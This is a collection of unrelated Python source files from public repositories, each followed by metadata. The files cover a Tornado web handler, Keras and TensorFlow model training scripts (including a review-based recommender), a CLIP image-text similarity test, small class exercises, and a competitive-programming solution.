71794438697 | import tornado.ioloop
from tornado.escape import json_decode
from tornado.web import RequestHandler, Application, url, RedirectHandler
class BaseHandler(tornado.web.RequestHandler):
def get_current_user(self):
user_id = self.get_secure_cookie("user")
if not user_id: return None
return "张三"
def get_user_locale(self):
if "locale" not in self.current_user.prefs:
# Use the Accept-Language header
return None
return self.current_user.prefs["locale"]
class MainHandler(BaseHandler):
def initialize(self):
self.supported_path = ['path_a', 'path_b', 'path_c']
def prepare(self):
action = self.request.path.split('/')[-1]
if action not in self.supported_path:
self.send_error(400)
if self.request.headers['Content-Type'] == 'application/x-json':
self.args = json_decode(self.request.body)
# def get(self):
# self.write('<a href="%s">link to story 1</a>' %
# self.reverse_url("story", "1"))
def get(self):
items = ["Item 1", "Item 2", "Item 3"]
self.render("template.html", title="My title", items=items)
class StoryHandler(RequestHandler):
# def initialize(self, db):
# self.db = db
def get(self, story_id):
self.write("this is story %s" % story_id)
def make_app():
return Application([
url(r"/", MainHandler),
url(r"/story/([0-9]+)", StoryHandler, name="story")
])
if __name__ == "__main__":
app = make_app()
app.listen(8888)
tornado.ioloop.IOLoop.current().start()
| LIMr1209/test | tornado/base.py | base.py | py | 1,626 | python | en | code | 0 | github-code | 90 |
42219496031 | import numpy as np
#코딩해서 80 출력
#1. 데이터
x = np.array([[1,2,3], [2,3,4], [3,4,5], [4,5,6],
[5,6,7], [6,7,8], [7,8,9], [8,9,10],
[9,10,11], [10,11,12], [20,30,40],
[30,40,50], [40,50,60]])
y = np.array([4,5,6,7,8,9,10,11,12,13,50,60,70])
x_pred=np.array([50,60,70])
print("x : shape", x.shape) # (13, 3)
print("y : shape", y.shape) # (13,)
#1.1 데이터 전처리
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
#MinMaxScaler 필수로 쓸것
scaler = MinMaxScaler()
scaler.fit(x)
x_train = scaler.transform(x)#x_train에 trans
# x = x.reshape(13,3,1) LSTM 3차원으로 reshape
x_pred=x_pred.reshape(1,3) # perdict 출력 수 조정 DNN 2차원으로 reshape
x_train, x_test, y_train, y_test = train_test_split(x, y, train_size = 0.8, shuffle = True, random_state = 2)
x_train, x_val, y_train, y_val = train_test_split(x_train, y_train, train_size = 0.8, shuffle = True, random_state = 2)
#2. 모델구성(DNN)
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, LSTM
model = Sequential()
model.add(Dense(13, activation = 'linear', input_shape = (3,)))
model.add(Dense(26))
model.add(Dense(52))
model.add(Dense(13))
model.add(Dense(13))
model.add(Dense(1))
model.summary()
#3.컴파일, 훈련
#EarlyStopping 사용, validation_data사용
from tensorflow.keras.callbacks import EarlyStopping
early_stopping = EarlyStopping(monitor = 'loss', patience = 30, mode = 'auto')
model.compile(loss = 'mse', optimizer = 'adam', metrics = ['acc'])
model.fit(x_train, y_train, epochs = 1000, batch_size = 1, verbose = 1, validation_data = (x_val, y_val),callbacks = [early_stopping])
#4. 평가, 예측
loss = model.evaluate(x_test,y_test)
print('loss : ', loss)
y_predict = model.predict(x_pred)
print('result : ',y_predict)
# loss : [0.03231086581945419, 0.0]
# result : [[79.23537]]
# loss : [0.004554993938654661, 0.0]
# result : [[80.282875]]
# loss : [0.1634834110736847, 0.0] LSTM_seq
# result : [[80.04349]]
# loss : [1.9020299911499023, 0.0] DNN early_stopping 102 / patience = 30
# result : [[79.991844]] | TaeYeon-kim-ai/keras | keras27_LSTM_DNN.py | keras27_LSTM_DNN.py | py | 2,179 | python | en | code | 0 | github-code | 90 |
6319385334 | from part1 import File
from part2 import Directory
class Dataset(Directory):
def __init__(self, name: str, max_size: int, category: str):
super().__init__(name, max_size)
self.category = category
def get_category(self):
return self.category
def final_test():
file1 = File('img001.png', 10)
file2 = File('img002.png', 20)
file3 = File('img003.png', 30)
file4 = File('img004.png', 40)
file5 = File('img005.png', 50)
file6 = File('img006.png', 60)
file7 = File('img007.png', 70)
file8 = File('img008.png', 80)
file9 = File('img009.png', 90)
file10 = File('img010.png', 100)
file11 = File('img011.png', 110)
file12 = File('img012.png', 120)
dataset1 = Dataset('d1', 1000, 'first dataset')
dataset2 = Dataset('d2', 1000, 'second dataset')
directory3 = Directory('d3', 1000)
dataset1.add_file(file1)
dataset1.add_file(file2)
dataset1.add_file(file3)
dataset1.add_file(file4)
dataset2.add_file(file5)
dataset2.add_file(file6)
dataset2.add_file(file7)
dataset2.add_file(file8)
directory3.add_file(file9)
directory3.add_file(file10)
directory3.add_file(file11)
directory3.add_file(file12)
largest_file_ds2 = max(dataset2.files, key=lambda file: file.size)
for file in directory3.files[:]:
if file.size > largest_file_ds2.size:
dataset1.add_file(file)
directory3.rm_file(file)
smallest_file_ds2 = min(dataset2.files, key=lambda file: file.size)
for file in dataset1.files[:]:
if file.size < smallest_file_ds2.size:
directory3.add_file(file)
dataset1.rm_file(file)
return dataset1, dataset2, directory3
if __name__ == '__main__':
# You can then use these classes like this:
coco = Dataset('COCO', 1000000000, 'Object Detection')
nu_scenes = Dataset('NuScenes', 500000000, 'Autonomous Driving')
file1 = File('image1.jpg', 1000000)
file2 = File('image2.jpg', 2000000)
coco.add_file(file1)
coco.add_file(file2)
size = coco.get_size()
category = coco.get_category()
dataset1, dataset2, directory3 = final_test()
print(dataset1)
print(dataset2)
print(directory3)
| goOdyaga/PYTHON | code4/part3.py | part3.py | py | 2,226 | python | en | code | 0 | github-code | 90 |
18246248309 | # E - Red and Green Apples
from collections import deque
X,Y,A,B,C = map(int,input().split())
P = list(map(int,input().split()))
Q = list(map(int,input().split()))
R = list(map(int,input().split()))
P.sort(reverse=True)
Q.sort(reverse=True)
R.sort(reverse=True)
P = deque(P)
Q = deque(Q)
R = deque(R)
red,green = 0,0
apple = [P.popleft(), Q.popleft(), R.popleft()]
ans = 0
for _ in range(X+Y):
mapple = max(apple)
ans += mapple
if apple[2]==mapple:
if len(R)>0:
apple[2] = R.popleft()
else:
apple[2] = -1
elif apple[0]==mapple:
red += 1
if red<X:
apple[0] = P.popleft()
else:
apple[0] = -1
else:
green += 1
if green<Y:
apple[1] = Q.popleft()
else:
apple[1] = -1
print(ans) | Aasthaengg/IBMdataset | Python_codes/p02727/s536825375.py | s536825375.py | py | 831 | python | en | code | 0 | github-code | 90 |
20804833657 | import torch
import clip
from PIL import Image
# 检查gpu
device = "cuda" if torch.cuda.is_available() else "cpu"
print("device state: ",device)
# 加载模型
model, transform = clip.load("ViT-B/32", device=device)
# 处理图片
image = transform(Image.open("/mnt/c/users/dwc20/pictures/dataset/search/flickr30k/test_img/36979.jpg")).unsqueeze(0).to(device)
texts = []
text_features = []
normalized_text_features = []
# 处理文字
texts.append(clip.tokenize(["A group of friends playing cards and trying to bluff each other into making a terrible mistake ."]).to(device))
texts.append(clip.tokenize(["A group of college students gathers to play texas hold em poker ."]).to(device))
texts.append(clip.tokenize(["Several men play cards while around a green table ."]).to(device))
texts.append(clip.tokenize(["A group of several men playing poker ."]).to(device))
texts.append(clip.tokenize(["Six white males playing poker ."]).to(device))
texts.append(clip.tokenize(["a lion is eating a rabbit."]).to(device))
# 使用模型
with torch.no_grad():
image_feature = model.encode_image(image)
for text in texts:
text_features.append(model.encode_text(text))
# 计算图像和文字之间的相似性
# 首先,对特征进行标准化
image_feature = image_feature / image_feature.norm(dim=-1, keepdim=True)
for text_feature in text_features:
normalized_text_feature = text_feature / text_feature.norm(dim=-1, keepdim=True)
normalized_text_features.append(normalized_text_feature)
# 然后,计算余弦相似性
for text_feature in normalized_text_features:
similarity = image_feature @ text_feature.T
print(similarity) | mmllllyyy/multi_model_search | clip_test.py | clip_test.py | py | 1,667 | python | en | code | 0 | github-code | 90 |
32409030976 | import os
badcase_txt = r'E:\Data\landmarks\HFB\test\badcase.txt'
json_path = r'E:\Data\landmarks\HFB\HFB\annotations\person_keypoints_val2017.json'
save_path = r'E:\Data\landmarks\HFB\test\crop_badcase.json'
def main():
# 得到所有badcase的图片名
image_name_list = list()
with open(badcase_txt, 'r') as f_txt:
badcase_info = f_txt.readlines()
for i in range(len(badcase_info)):
image_name = os.path.split(badcase_info[i])[1].split('\n')[0]
image_name_list.append(image_name)
if __name__ == '__main__':
main() | Daming-TF/HandData | scripts/Data_Interface/halpe_full_body/draw_out_badcase_json.py | draw_out_badcase_json.py | py | 565 | python | en | code | 1 | github-code | 90 |
15274591707 | class Solution:
def maximumBags(self, capacity: List[int], rocks: List[int], additionalRocks: int) -> int:
for i in range(len(capacity)):
capacity[i] -= rocks[i]
capacity.sort()
for i in range(len(capacity)):
additionalRocks -= capacity[i]
if additionalRocks == 0:
return i+1
if additionalRocks < 0:
return i
return len(rocks) | kelvinleong0529/Leet-Code | 2279-maximum-bags-with-full-capacity-of-rocks/2279-maximum-bags-with-full-capacity-of-rocks.py | 2279-maximum-bags-with-full-capacity-of-rocks.py | py | 442 | python | en | code | 3 | github-code | 90 |
40730330779 | import tensorflow as tf
import pickle
import time
import os
from tensorflow.python.keras.layers import Dense, Embedding, Conv2D, Dropout, Masking
from tensorflow.python.keras.regularizers import l1, l2
import numpy as np
#原版
class ADMN():
def __init__(self,args):
tf.set_random_seed(0)
np.random.seed(2019)
#模型基本参数
self.review_max_word = args["review_max_word"]
self.review_max_num = args["review_max_num"] #评论窗口
self.vocabulary_num = args["vocabulary_num"]
self.user_num = args["user_num"]
self.item_num = args["item_num"]
self.regularizers = args["regularizers"]
self.rating_weight = args["rating_weight"] #计算评分的方法
#用户id向量,文本,商品编码维度 ,一般用户和商品维度要一致
self.word_embedding_dimension = args["word_embedding_dimension"]
self.user_embedding_dimension = args["user_embedding_dimension"]
self.item_embedding_dimension = args["item_embedding_dimension"]
#cnn卷积层参数
self.cnn_filters = args["cnn_filters"]
self.cnn_padding = args["cnn_padding"]
self.cnn_activation = args["cnn_activation"]
self.cnn_kernel_regularizer = args["cnn_kernel_regularizer"]
self.cnn_kernel_size = args["cnn_kernel_size"]
self.cnn_strides = args["cnn_strides"]
self.dropout_size = args["dropout_size"]
#fm层参数
self.fm_size = args["fm_size"]
self.fm_K = args["fm_K"]
#训练参数
self.learning_rate = args["learning_rate"]
self.beta1 = args["beta1"]
self.beta2 = args["beta2"]
self.epsilon = args["epsilon"]
#self.word_embedding_path = os.path.join(args["root_path"],args["input_data_type"],"word_emb.pkl")
self.batch_size = args["batch_size"]
self.train_time = args["train_time"]
self.sess = args["sess"]
self.is_sample = args["is_sample"]
self.sample_ratio = args["sample_ratio"]
with tf.name_scope("creat_placeholder"):
# shape(none)对应batch大小
self.user_id = tf.placeholder(dtype="int32", shape=(None, 1), name="user_id") # user_id
self.item_id = tf.placeholder(dtype="int32", shape=(None, 1), name="item_id") # item_id
self.user_review = tf.placeholder(tf.float32, [None, self.review_max_num , self.review_max_word],
name="user_review") # user_review 用户评论
self.item_review = tf.placeholder(tf.float32, [None, self.review_max_num , self.review_max_word], name="item_review") # 商品评论
self.user_commented_items_id = tf.placeholder(dtype="int32", shape=(None, self.review_max_num),
name="user_commented_items_id") # 用户评论过的商品的id
self.user_commented_items_rate = tf.placeholder(dtype="float32", shape=(None,self.review_max_num),name="user_commented_items_rate") # 跟上面user_rid对应评论-评分
self.item_commented_users_id = tf.placeholder(dtype="int32", shape=(None, self.review_max_num), name="item_commented_users_id") # 商品评论的人的id
self.item_commented_users_rate = tf.placeholder(dtype="float32", shape=(None, self.review_max_num),name="item_commented_users_rate") # 商品的评论的人的给的分数
self.input_y = tf.placeholder(tf.float32,[None, 1], name="input_y")#评分 # item商品评论
with tf.name_scope("build_review_embedding"):
self.user_review_flat = tf.reshape(self.user_review,[-1,self.review_max_num*self.review_max_word])
print("user_review_flat:{}".format(self.user_review_flat.shape))
self.item_review_flat = tf.reshape(self.item_review,[-1,self.review_max_num*self.review_max_word])
print("item_review_flat:{}".format(self.item_review_flat.shape))
self.user_review_mask = Masking(mask_value=0,input_shape=(self.review_max_num,self.review_max_word))(self.user_review_flat)#mask掉0值,忽略0值
self.item_review_mask = Masking(mask_value=0,input_shape=(self.review_max_num,self.review_max_word))(self.item_review_flat)#忽略商品评论的0值
self.review_embedding_layer = Embedding(input_dim=self.vocabulary_num,output_dim=self.word_embedding_dimension,input_length=self.review_max_num*self.review_max_num)
self.user_review_embedding = self.review_embedding_layer(self.user_review_mask)
self.user_review_embedding = tf.reshape(self.user_review_embedding,shape=[-1, self.review_max_num, self.review_max_word, self.word_embedding_dimension])
print("user_review_embedding:{}".format(self.user_review_embedding.shape))
self.item_review_embedding = self.review_embedding_layer(self.item_review_mask)
self.item_review_embedding = tf.reshape(self.item_review_embedding,shape=[-1, self.review_max_num, self.review_max_word, self.word_embedding_dimension])
print("item_review_embedding:{}".format(self.item_review_embedding.shape))
self.user_review_embedding_sentence = tf.reduce_sum(self.user_review_embedding,axis=2)
print("user_review_embedding_sentence:{}".format(self.user_review_embedding_sentence.shape))
self.item_review_embedding_sentence = tf.reduce_sum(self.item_review_embedding,axis=2)
print("item_review_embedding_sentence:{}".format(self.item_review_embedding_sentence.shape))
#用户商品id向量编码
with tf.name_scope("build_user_item_id_embedding"):
self.user_embedding_layer = Embedding(input_dim=self.user_num,output_dim=self.user_embedding_dimension)
self.user_id_embedding = self.user_embedding_layer(self.user_id)
self.item_embedding_layer = Embedding(input_dim=self.item_num,output_dim=self.item_embedding_dimension)
self.item_id_embedding = self.item_embedding_layer(self.item_id)
self.user_commented_items_id_mask = Masking(mask_value=0)(self.user_commented_items_id)
self.item_commented_users_id_mask = Masking(mask_value=0)(self.item_commented_users_id)
self.user_commented_items_id_mask_embedding = self.item_embedding_layer(self.user_commented_items_id_mask)
self.item_commented_users_id_mask_embedding = self.user_embedding_layer(self.item_commented_users_id_mask)
print("user_commented_items_id_mask_embedding:{}".format(self.user_commented_items_id_mask_embedding.shape))
print("item_commented_users_id_mask_embedding:{}".format(self.item_commented_users_id_mask_embedding.shape))
with tf.name_scope("build_user_item_extra_embedding"):
if (self.rating_weight == "base"): # 1
self.user_commented_items_rate_sum = tf.reduce_sum(self.user_commented_items_rate, axis=1, keepdims=True)
self.user_commented_items_rate_base = self.user_commented_items_rate / self.user_commented_items_rate_sum
self.user_commented_items_rate_base_weight = tf.reshape(self.user_commented_items_rate_base,
shape=(-1, self.review_max_num, 1))
self.user_commented_items_weight = self.user_commented_items_rate_base_weight
self.item_commented_users_rate_sum = tf.reduce_sum(self.item_commented_users_rate, axis=1, keepdims=True)
self.item_commented_users_rate_base = self.item_commented_users_rate / self.item_commented_users_rate_sum
self.item_commented_users_rate_base_weight = tf.reshape(self.item_commented_users_rate_base,
shape=(-1, self.review_max_num, 1))
self.item_commented_users_weight = self.item_commented_users_rate_base_weight
if(self.rating_weight=="softmax"): #2
self.user_commented_items_rate_softmax = tf.reshape(tf.nn.softmax(self.user_commented_items_rate,axis=1,name="user_commented_item_rate_softmax"),shape=(-1,self.review_max_num,1))
self.user_commented_items_weight = self.user_commented_items_rate_softmax
print("user_commented_items_rate_softmax:{}".format(self.user_commented_items_rate_softmax.shape))
self.item_commented_users_rate_softmax = tf.reshape(tf.nn.softmax(self.item_commented_users_rate,axis=1,name="item_commented_item_rate_softmax"),shape=(-1,self.review_max_num,1))
print("item_commented_users_rate_softmax:{}".format(self.item_commented_users_rate_softmax.shape))
self.item_commented_users_weight = self.item_commented_users_rate_softmax
if(self.rating_weight == "unbias_softmax"): #3
self.user_commented_items_rate_mean = tf.reduce_mean(self.user_commented_items_rate,axis=1,keepdims=True)
self.user_commented_items_rate_unbias = self.user_commented_items_rate - self.user_commented_items_rate_mean
self.user_commented_items_rate_unbias_softmax = tf.reshape(tf.nn.softmax(self.user_commented_items_rate_unbias,axis=1,name="user_commented_items_rate_unbias_softmax"),shape=(-1,self.review_max_num,1))
self.user_commented_items_weight = self.user_commented_items_rate_unbias_softmax
self.item_commented_users_rate_mean = tf.reduce_mean(self.item_commented_users_rate,axis=1,keepdims=True)
self.item_commented_users_rate_unbias = self.item_commented_users_rate - self.item_commented_users_rate_mean
self.item_commented_users_rate_unbias_softmax = tf.reshape(tf.nn.softmax(self.item_commented_users_rate_unbias,axis=1,name="item_commented_user_rate_unbias_softmax"),shape=(-1,self.review_max_num,1))
self.item_commented_users_weight = self.item_commented_users_rate_unbias_softmax
if (self.rating_weight == "abs_unbias"): # 4
self.user_commented_items_rate_mean = tf.reduce_mean(self.user_commented_items_rate, axis=1,
keepdims=True)
self.user_commented_items_rate_abs_unbias = tf.abs(
self.user_commented_items_rate - self.user_commented_items_rate_mean)
self.user_commented_items_rate_abs_unbias_sum = tf.reduce_sum(self.user_commented_items_rate, axis=1,
keepdims=True)
self.user_commented_items_rate_abs_unbias_weight = self.user_commented_items_rate / self.user_commented_items_rate_abs_unbias_sum
self.user_commented_items_weight = tf.reshape(self.user_commented_items_rate_abs_unbias_weight,
shape=(-1, self.review_max_num, 1))
self.item_commented_users_rate_mean = tf.reduce_mean(self.item_commented_users_rate, axis=1,
keepdims=True)
self.item_commented_users_rate_abs_unbias = tf.abs(
self.item_commented_users_rate - self.item_commented_users_rate_mean)
self.item_commented_users_rate_abs_unbias_sum = tf.reduce_sum(self.item_commented_users_rate_abs_unbias,
axis=1, keepdims=True)
self.item_commented_users_rate_abs_unbias_weight = self.item_commented_users_rate / self.item_commented_users_rate_abs_unbias_sum
self.item_commented_users_weight = tf.reshape(self.item_commented_users_rate_abs_unbias_weight,
shape=(-1, self.review_max_num, 1))
if(self.rating_weight == "abs_unbias_softmax"): #5
self.user_commented_items_rate_mean = tf.reduce_mean(self.user_commented_items_rate, axis=1, keepdims=True)
self.user_commented_items_rate_abs_unbias = tf.abs(self.user_commented_items_rate - self.user_commented_items_rate_mean)
self.user_commented_items_rate_abs_unbias_softmax = tf.reshape(
tf.nn.softmax(self.user_commented_items_rate_abs_unbias, axis=1,
name="user_commented_items_rate_abs_unbias_softmax"), shape=(-1, self.review_max_num, 1))
self.user_commented_items_weight = self.user_commented_items_rate_abs_unbias_softmax
self.item_commented_users_rate_mean = tf.reduce_mean(self.item_commented_users_rate, axis=1, keepdims=True)
self.item_commented_users_rate_abs_unbias = tf.abs(self.item_commented_users_rate - self.item_commented_users_rate_mean)
self.item_commented_users_rate_abs_unbias_softmax = tf.reshape(
tf.nn.softmax(self.item_commented_users_rate_abs_unbias, axis=1,
name="item_commented_user_rate_abs_unbias_softmax"), shape=(-1, self.review_max_num, 1))
self.item_commented_users_weight = self.item_commented_users_rate_abs_unbias_softmax
if(self.rating_weight == "no_rating"): #6
self.user_review_to_itemId = tf.reshape(tf.multiply(self.user_commented_items_id_mask_embedding,self.item_id_embedding),shape=(-1,self.user_embedding_dimension))
self.user_review_to_itemId_dense = Dense(1,activation="relu")(self.user_review_to_itemId)
self.user_review_to_itemId_dense = tf.reshape(self.user_review_to_itemId_dense,shape=(-1,self.review_max_num,1))
print("user_review_to_itemId_dense:{}".format(self.user_review_to_itemId_dense.shape))
self.user_review_to_itemId_dense_softmax =tf.nn.softmax(self.user_review_to_itemId_dense, axis=1,name="user_review_to_itemId_dense_softmax")
print("user_review_to_itemId_dense_softmax:{}".format(self.user_review_to_itemId_dense_softmax.shape))
self.user_review_to_itemId_dense_softmax = tf.reshape( self.user_review_to_itemId_dense_softmax,shape=[-1,self.review_max_num,1])
self.user_commented_items_weight = self.user_review_to_itemId_dense_softmax
self.item_review_to_userId = tf.reshape(tf.multiply(self.item_commented_users_id_mask_embedding,self.user_id_embedding),shape=(-1,self.user_embedding_dimension))
self.item_review_to_userId_dense = Dense(1,activation="relu")(self.item_review_to_userId)
self.item_review_to_userId_dense = tf.reshape(self.item_review_to_userId_dense,shape=(-1,self.review_max_num,1))
self.item_review_to_userId_dense_softmax = tf.nn.softmax(self.item_review_to_userId_dense,axis=1,
name="item_review_to_userId_dense_softmax")
self.item_review_to_userId_dense_softmax = tf.reshape(self.item_review_to_userId_dense_softmax,shape=[-1,self.review_max_num,1])
self.item_commented_users_weight = self.item_review_to_userId_dense_softmax
self.user_review_weight = self.user_commented_items_weight * self.user_review_embedding_sentence
self.item_review_weight = self.item_commented_users_weight * self.item_review_embedding_sentence
self.user_review_feature = tf.reduce_sum(tf.multiply(self.user_review_weight,self.item_id_embedding),axis=1,keepdims=True)
self.item_review_feature = tf.reduce_sum(tf.multiply(self.item_review_weight,self.user_id_embedding),axis=1,keepdims=True)
print("user_review_feature:{}".format(self.user_review_feature.shape))
print("item_review_feature:{}".format(self.item_review_feature))
with tf.name_scope("build_item_attention"):
self.item_attention = tf.matmul(self.user_id_embedding,tf.transpose(self.item_review_embedding_sentence,[0,2,1]))
self.item_attention = tf.reshape(tf.nn.softmax(self.item_attention),shape=[-1,self.review_max_num,1])
print("item_attention:{}".format(self.item_attention.shape))
self.item_feature = self.item_attention * self.item_review_embedding_sentence
self.item_feature = tf.reduce_sum(self.item_feature,axis=1,keepdims=True)
with tf.name_scope("build_user_attention"):
self.user_attention = tf.matmul(self.item_id_embedding,tf.transpose(self.user_review_embedding_sentence,[0,2,1]))
self.user_attention = tf.reshape(tf.nn.softmax(self.user_attention),shape=[-1,self.review_max_num,1])
print("user_attention:{}".format(self.user_attention.shape))
self.user_feature = self.user_attention * self.user_review_embedding_sentence
self.user_feature = tf.reduce_sum(self.user_feature,axis=1,keepdims=True)
with tf.name_scope("build_concat_layer"):
self.user_feature_concat = tf.concat([self.user_id_embedding,self.user_feature,self.user_review_feature],axis=2,name="user_concat")
self.item_feature_concat = tf.concat([self.item_id_embedding,self.item_feature,self.item_review_feature],axis=2,name="item_concat")
print("user_feature_concat:{}".format(self.user_feature_concat.shape))
print("item_feature_concat:{}".format(self.item_feature_concat.shape))
self.user_feature_dense = Dense(self.user_embedding_dimension,activation="relu")(self.user_feature_concat)
self.item_feature_dense = Dense(self.item_embedding_dimension,activation="relu")(self.item_feature_concat)
print("user_feature_dense:{}".format(self.user_feature_dense.shape))
print("item_feature_dense:{}".format(self.item_feature_dense.shape))
with tf.name_scope("build_outer_product"):
self.user_item_matrix = tf.matmul(tf.transpose(self.user_feature_dense,perm=[0,2,1]),self.item_feature_dense)
self.user_item_matrix = tf.expand_dims(self.user_item_matrix,-1,name="tran3D")
with tf.name_scope("build_convolution_layer"):
self.first_layer = Conv2D(filters=self.cnn_filters,kernel_size=self.cnn_kernel_size,strides=self.cnn_strides,padding=self.cnn_padding,activation=self.cnn_activation,
kernel_regularizer=self.cnn_kernel_regularizer)(self.user_item_matrix)
self.second_layer = Conv2D(filters=self.cnn_filters,kernel_size=self.cnn_kernel_size,strides=self.cnn_strides,padding=self.cnn_padding,activation=self.cnn_activation,
kernel_regularizer=self.cnn_kernel_regularizer)(self.first_layer)
self.third_layer = Conv2D(filters=self.cnn_filters,kernel_size=self.cnn_kernel_size,strides=self.cnn_strides,padding=self.cnn_padding,activation=self.cnn_activation,
kernel_regularizer=self.cnn_kernel_regularizer)(self.second_layer)
self.fourth_layer = Conv2D(filters=self.cnn_filters,kernel_size=self.cnn_kernel_size,strides=self.cnn_strides,padding=self.cnn_padding,activation=self.cnn_activation,
kernel_regularizer=self.cnn_kernel_regularizer)(self.third_layer)
self.fifth_layer = Conv2D(filters=self.cnn_filters,kernel_size=self.cnn_kernel_size,strides=self.cnn_strides,padding=self.cnn_padding,activation=self.cnn_activation,
kernel_regularizer=self.cnn_kernel_regularizer)(self.fourth_layer)
self.sixth_layer = Conv2D(filters=self.cnn_filters,kernel_size=self.cnn_kernel_size,strides=self.cnn_strides,padding=self.cnn_padding,activation=self.cnn_activation,
kernel_regularizer=self.cnn_kernel_regularizer)(self.fifth_layer)
self.dropout_layer = Dropout(self.dropout_size)(self.sixth_layer)
with tf.name_scope("build_prediction"):
self.final_vector = tf.reshape(self.dropout_layer,shape=[-1,self.cnn_filters])
self.fm_w0 = tf.Variable(tf.zeros([1]))
self.fm_W = tf.Variable(tf.truncated_normal([self.cnn_filters]))
self.fm_V = tf.Variable(tf.random_normal([self.fm_K,self.cnn_filters],stddev=0.01))
self.linear_terms = tf.add(self.fm_w0,
tf.reduce_sum(
tf.multiply(self.fm_W,self.final_vector),axis=1,keepdims=True
))
self.interactions = tf.add(self.fm_w0,tf.reduce_sum(
tf.subtract(
tf.pow(tf.matmul(self.final_vector,tf.transpose(self.fm_V)),2),
tf.matmul(tf.pow(self.final_vector,2),tf.transpose(tf.pow(self.fm_V,2)))),
axis=1,keepdims=True
)
)
self.output = tf.add(self.linear_terms,self.interactions)
print("output:{}".format(self.output.shape))
self.error = tf.subtract(self.output, self.input_y)
with tf.name_scope("train_loss"):
self.loss = tf.sqrt(tf.reduce_mean(tf.square(tf.subtract(self.output, self.input_y))))
with tf.name_scope("test_loss"): #因为测试集没法一次性输入
self.test_loss = tf.square(tf.subtract(self.output,self.input_y))
def model_init(self):
self.init = tf.global_variables_initializer()
#sess.run(self.word_embedding_matrix.initializer, feed_dict={self.emb_initializer: self.emb})
self.sess.run(self.init)
def load_data(self,train_data,test_data,para_file):
#train_data为music.train
para_data = pickle.load(open(para_file,"rb"))
self.test_data = np.array(pickle.load(open(test_data,"rb")))
self.train_data = np.array(pickle.load(open(train_data,"rb"))) #这个只是用户商品评论数据
self.users_review = para_data['user_review']
self.items_review = para_data['item_review']
self.user_r_rating = para_data["user_r_rating"]
self.item_r_rating = para_data["item_r_rating"]
self.user_r_id = para_data["user_r_id"]
self.item_r_id = para_data["item_r_id"]
def search_train_data(self,uid, iid, user_r_id, item_r_id, user_r_rating, item_r_rating):
data_num = len(uid)
user_r_id_batch = np.zeros(shape=(data_num, self.review_max_num))
item_r_id_batch = np.zeros(shape=(data_num, self.review_max_num))
user_r_rating_batch = np.zeros(shape=(data_num, self.review_max_num))
item_r_rating_batch = np.zeros(shape=(data_num, self.review_max_num))
# user_r_id = list(user_r_id)
# print (user_r_id[2])
for i, item in enumerate(uid):
user_r_id_batch[i, :] = user_r_id[int(item)]
# print (user_r_id)
user_r_rating_batch[i, :] = user_r_rating[int(item)]
for i, item in enumerate(iid):
item_r_id_batch[i, :] = item_r_id[int(item)]
item_r_rating_batch[i, :] = item_r_rating[int(item)]
# print ()
return user_r_id_batch, item_r_id_batch, user_r_rating_batch, item_r_rating_batch
def model_train(self):
#self.model_init()
print("model_train")
#self.load_test_data()
self.test_loss_list = []
#self.global_step = tf.Variable(0, name="global_step", trainable=False)
self.total_optimizer = tf.train.AdamOptimizer(learning_rate =self.learning_rate,beta1=self.beta1,beta2=self.beta2,epsilon=self.epsilon).minimize(self.loss)
self.train_data_size = len(self.train_data)
self.model_init()
print("data_size_train:{}".format(self.train_data_size))
self.ll = int(self.train_data_size / self.batch_size) + 1
print("train_time:{}".format(self.ll))
for epoch in range(self.train_time):
print("epoch_i:{}".format(epoch))
train_rmse = []
self.shuffle_index = np.random.permutation(np.arange(self.train_data_size))
self.shuffle_data = self.train_data[self.shuffle_index]
#print("shuffle_data:",self.shuffle_data.shape)
for batch_num in range(self.ll):
start_index = batch_num * self.batch_size
end_index = min((batch_num+1)*self.batch_size,self.train_data_size-1)
#print("end_index:",end_index)
data_train = self.shuffle_data[start_index:end_index]
batch_user_id,batch_item_id,batch_y = list(zip(*data_train))
batch_user_review = []
batch_item_review = []
for i in range(len(data_train)):
batch_user_review.append(self.users_review[batch_user_id[i][0]])
batch_item_review.append(self.items_review[batch_item_id[i][0]])
batch_user_review = np.array(batch_user_review)
batch_item_review = np.array(batch_item_review)
batch_user_r_id,batch_item_r_id,batch_user_r_rate,batch_item_r_rate =self.search_train_data(batch_user_id,
batch_item_id,
self.user_r_id,
self.item_r_id,
self.user_r_rating,
self.item_r_rating)
feed_dict = {
self.user_id: batch_user_id,
self.item_id: batch_item_id,
self.input_y: batch_y,
self.user_review: batch_user_review,
self.item_review: batch_item_review,
self.user_commented_items_id: batch_user_r_id,
self.user_commented_items_rate: batch_user_r_rate,
self.item_commented_users_id: batch_item_r_id,
self.item_commented_users_rate: batch_item_r_rate
}
_,t_rmse,error = self.sess.run([self.total_optimizer,self.loss,self.error],feed_dict)
if self.is_sample==True:
self.random_sample(batch_user_id,batch_item_id,batch_y,batch_user_r_id,batch_item_r_id,batch_user_r_rate,batch_item_r_rate,error)
#current_step = tf.train.global_step(self.sess, self.global_step)
train_rmse.append(t_rmse)
print("t_rmse:{}".format(t_rmse))
if batch_num ==(self.ll-1): #预测
print("\nEvaluation:")
print(batch_num)
self.model_test()
def show_test_result(self):
print((" test_loss_list:{}".format(self.test_loss_list)))
self.besr_test_mse = min(self.test_loss_list)
print("best test_mse:{}".format(self.besr_test_mse ))
print('end')
def model_test(self):
self.test_data_size = len(self.test_data)
self.ll_test = int(self.test_data_size / self.batch_size) + 1
test_cost = []
for batch_num in range(self.ll_test):
start_index = batch_num * self.batch_size
end_index = min((batch_num+1)*self.batch_size,self.test_data_size-1)
data_test = self.test_data[start_index:end_index]
user_id_test,item_id_test,y_test = list(zip(*data_test))
user_valid = []
item_valid = []
for i in range(len(data_test)):
user_valid.append(self.users_review[user_id_test[i][0]])
item_valid.append(self.items_review[item_id_test[i][0]])
user_valid = np.array(user_valid)
item_valid = np.array(item_valid)
user_r_id_batch, item_r_id_batch, user_r_rate_batch, item_r_rate_batch = self.search_train_data(
user_id_test, item_id_test, self.user_r_id, self.item_r_id, self.user_r_rating, self.item_r_rating)
feed_dict = {
self.user_id: user_id_test,
self.item_id: item_id_test,
self.input_y: y_test,
self.user_review: user_valid,
self.item_review: item_valid,
self.user_commented_items_id: user_r_id_batch,
self.user_commented_items_rate: user_r_rate_batch,
self.item_commented_users_id: item_r_id_batch,
self.item_commented_users_rate: item_r_rate_batch
}
test_loss = self.sess.run([self.test_loss],feed_dict)
test_cost.append(test_loss)
total_mse = 0
for i in test_cost:
for j in i:
for k in j:
total_mse += k
final_mse = total_mse/self.test_data_size
print("test_final_mse:{}".format(final_mse))
